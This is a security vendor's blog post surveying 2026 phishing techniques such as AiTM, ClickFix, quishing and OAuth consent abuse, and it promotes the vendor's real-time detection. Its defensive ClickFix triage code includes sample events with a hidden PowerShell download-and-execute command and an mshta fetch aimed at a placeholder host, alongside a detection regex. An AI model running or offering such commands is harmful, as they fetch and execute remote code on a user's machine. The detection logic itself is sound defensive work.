
The latest phishing techniques in 2026

The 2026 phishing toolkit looks nothing like a decade ago. Here are the techniques defining the threat right now — and the uncomfortable pattern they all share.

Research · 8 min read · By SafeToOpen Research · June 2026

The phishing of 2026 looks nothing like the misspelled “Nigerian prince” era. Today’s techniques are precise, automated, and — this is the key insight — each one is engineered to defeat a specific defence you’ve already deployed. Read the list below not as a catalogue of tricks but as a map of how attackers route around every control in a typical security stack.

1. Adversary-in-the-middle (AiTM) — beats MFA

An AiTM kit proxies the real login page. You enter your real password, approve your real MFA prompt, and the attacker silently captures the resulting session token — a valid credential that bypasses MFA, SSO and Conditional Access. [1] Microsoft logged over 10,000 AiTM attacks a month in 2024, and stolen tokens accounted for roughly 31% of Microsoft 365 breaches in 2025. [1][2] One platform, Tycoon 2FA, was behind about 62% of the phishing Microsoft blocked by mid-2025.

2. Browser-in-the-browser (BitB) — beats “check the URL”

BitB draws a fake browser pop-up inside the real page, complete with a convincing title bar, padlock and a legitimate-looking address bar that is really just styled text. [3] It defeats the single most-taught piece of advice — verify the URL — by handing the user a URL that looks perfect.

3. Quishing (QR-code phishing) — beats email link scanners

By putting the malicious link inside a QR code (often embedded in a PDF or image), attackers slip past filters that scan text and URLs, and push the victim onto a personal phone outside corporate defences. Quishing rose roughly 400% between 2023 and 2025, and in one analysis nearly one in four campaigns disguised QR codes or links as MFA prompts. [4]

4. ClickFix / fake CAPTCHA — beats “don’t open attachments”

The fastest-rising technique of the cycle flips the script: instead of delivering malware, it convinces the user to run it themselves. A fake “verify you’re human” or “fix this error” page tells the victim to paste a command into their own computer. It sidesteps attachment scanning entirely — and it works: ClickFix appeared in 47% of Microsoft’s initial-access incident notifications in 2025. [5]

47% of Microsoft Defender Experts’ initial-access notifications in 2025 involved ClickFix — tricking users into running the attack themselves. (Microsoft MDDR, 2025) [5]
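The user-runs-it-themselves pattern described above leaves a distinctive trace on the endpoint: a scripting host started straight from the desktop shell with a command line that fetches remote content. The following triage rule is an added example (not SafeToOpen's code); the events are constructed, and the field names are an assumption modelled on Sysmon process-creation logs.

```python
import re

# Constructed sample events; field names are an assumption modelled on Sysmon Event ID 1.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/x | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://example.invalid/verify"},
    {"ParentImage": r"C:\Program Files\Git\cmd\git.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c git status"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Date"},
]

# Scripting hosts a pasted ClickFix command typically lands in.
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe")

# Indicators that the command pulls remote content, decodes a payload, or hides its window.
REMOTE = re.compile(
    r"https?://|\biwr\b|invoke-webrequest|downloadstring|\biex\b|invoke-expression"
    r"|-enc(odedcommand)?\b|-w(indowstyle)? hidden",
    re.I,
)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_clickfix_like(event):
    """True when a scripting host is spawned by explorer.exe (i.e. the user launched it
    interactively, e.g. via the Run dialog) and its command line fetches remote content."""
    return (
        _basename(event["ParentImage"]) == "explorer.exe"
        and _basename(event["Image"]) in SHELLS
        and REMOTE.search(event["CommandLine"]) is not None
    )


def triage(events):
    """Return the command lines worth an analyst's attention."""
    return [e["CommandLine"] for e in events if is_clickfix_like(e)]
```

A benign interactive PowerShell session (last event) and a shell spawned by a developer tool (third event) are left alone; only the two explorer-launched downloaders are flagged.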

5. AI-generated lures & deepfakes — beats “spot the bad grammar”

Generative AI writes fluent, personalised lures at scale — over 82% of phishing emails now show AI assistance, and AI detectors fail to flag machine-written phishing about three times out of four. [6] It has gone multi-modal, too: voice cloning needs just three seconds of audio, and a deepfake video call impersonating executives convinced a finance worker to wire $25 million in the 2024 Arup case. [7] Video and voice are no longer proof of identity.

6. Vishing & callback phishing — beats email filters entirely

If filters block the email, move to the phone. Voice phishing surged 442% between the first and second halves of 2024, supercharged by AI voice cloning, and smishing and vishing together now account for about 19% of breaches. [7] “Callback” lures send a harmless-looking email urging the victim to phone “support,” where a human (or a cloned voice) walks them into installing access or surrendering a code.

7. OAuth consent & device-code phishing — beats password + MFA

These abuse legitimate sign-in flows. Instead of stealing a password, the attacker tricks the user into granting a malicious app permission or authorising an attacker’s device — gaining standing access with no password and no MFA prompt to trip. [2] Because the flow is genuine, it looks like normal activity.
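Because these flows are genuine, detection has to key on context rather than on a bad URL: a device-code sign-in from an address the user has never used, or a user-granted consent to an unapproved app that asks for standing mailbox or file access. The two triage rules below are an added example (not SafeToOpen's code); the events are constructed, and the field names and the scope list are assumptions modelled on Microsoft Entra sign-in and audit logs.

```python
# Permissions that grant standing access to mail or files once consented; an editorial choice.
HIGH_IMPACT = {"Mail.Read", "Mail.ReadWrite", "Files.ReadWrite.All",
               "offline_access", "MailboxSettings.ReadWrite"}

# Apps the tenant has reviewed and approved (constructed allowlist).
APPROVED_APPS = {"Corporate Expense App"}

# Constructed sign-in events; "protocol" mirrors the authenticationProtocol field (assumption).
SIGNINS = [
    {"user": "alice@example.invalid", "protocol": "deviceCode", "ip": "203.0.113.9", "status": "success"},
    {"user": "alice@example.invalid", "protocol": "none", "ip": "198.51.100.4", "status": "success"},
    {"user": "bob@example.invalid", "protocol": "deviceCode", "ip": "198.51.100.4", "status": "success"},
]

# Addresses each user has signed in from before (constructed baseline).
USER_KNOWN_IPS = {
    "alice@example.invalid": {"198.51.100.4"},
    "bob@example.invalid": {"198.51.100.4"},
}

# Constructed consent-grant audit events.
CONSENTS = [
    {"user": "alice@example.invalid", "app": "Invoice Viewer",
     "scopes": ["offline_access", "Mail.Read"], "consent_type": "Principal"},
    {"user": "bob@example.invalid", "app": "Corporate Expense App",
     "scopes": ["User.Read"], "consent_type": "AllPrincipals"},
]


def risky_device_code_signins(signins, known_ips):
    """Successful device-code sign-ins from an address the user has never used before."""
    return [
        s for s in signins
        if s["protocol"] == "deviceCode"
        and s["status"] == "success"
        and s["ip"] not in known_ips.get(s["user"], set())
    ]


def risky_consents(consents):
    """Consents to unapproved apps that request high-impact scopes, as (user, app, scopes)."""
    flagged = []
    for c in consents:
        scopes = HIGH_IMPACT.intersection(c["scopes"])
        if c["app"] not in APPROVED_APPS and scopes:
            flagged.append((c["user"], c["app"], sorted(scopes)))
    return flagged
```

Bob's device-code sign-in comes from his usual address and his consent is to an approved app, so neither is flagged; Alice's unfamiliar-address device-code sign-in and her consent to an unreviewed app requesting mailbox access both are.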

8. Phishing-as-a-service — the model behind all of it

None of the above requires elite skill anymore. Subscription kits bundle AiTM, evasion, hosting and templates for around $120, with dashboards and Telegram support. [1] Commoditisation is why these techniques spread so fast: the moment one works, it’s packaged and sold to everyone.

The pattern that matters

Line them up and the throughline is obvious: every modern technique is built to defeat a control you already trust. AiTM beats MFA. BitB beats URL-checking. Quishing beats link scanners. ClickFix beats attachment scanning. AI beats the grammar test. Vishing beats email filters. Each one routes around a static, known-pattern defence — a blocklist, a filter, a training rule — by being new, or convincing, or off-channel.

Detection that doesn’t need to have seen it before

Static defences catch yesterday’s attack. SafeToOpen judges the page and the message in real time, on their own behaviour — so a brand-new technique is caught the first time it appears.


The takeaway

The specific techniques will keep changing — whatever tops this list in 2027 hasn’t been packaged yet. What won’t change is the strategy: find the gap in a defence that waits to recognise something it has seen before. The counter is a defence that doesn’t wait — one that analyses what’s actually in front of the user, the instant it loads, regardless of whether it’s ever been seen. That’s the only kind of protection that keeps pace with a threat designed to always be one step new.


Sources

  1. WorkOS, How attackers are bypassing MFA (AiTM 10,000/month; Tycoon 2FA 62%; PhaaS pricing)
  2. Obsidian Security, Token-Based Attacks (token theft 31% of M365 breaches; OAuth/device-code abuse)
  3. mr.d0x, Browser In The Browser (BITB) Attack
  4. Quishing growth & MFA-disguised QR campaigns, via Bright Defense / StationX
  5. Microsoft 2025 Digital Defense Report, ClickFix in 47% of initial-access notifications, via Keepnet
  6. AI-written phishing (82.6%) & AI-detector failure rate, via Vectra AI / Egress
  7. CrowdStrike 2025 (vishing +442%; $25M Arup deepfake call) & Verizon DBIR 2025, via StationX

External statistics are attributed to their original publishers and were accurate at the time of writing. Figures from industry reports vary by methodology and period; we link to primary sources so you can verify them.
